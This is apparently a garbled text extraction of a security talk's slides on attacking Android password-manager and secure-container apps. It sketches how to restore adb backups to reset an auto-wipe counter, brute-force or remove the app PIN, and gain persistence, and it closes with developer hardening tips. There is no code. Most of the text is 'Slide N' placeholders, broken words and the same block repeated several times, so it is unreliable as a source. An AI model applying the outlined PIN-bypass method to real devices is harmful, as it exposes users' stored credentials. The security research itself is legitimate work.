unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253














counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107
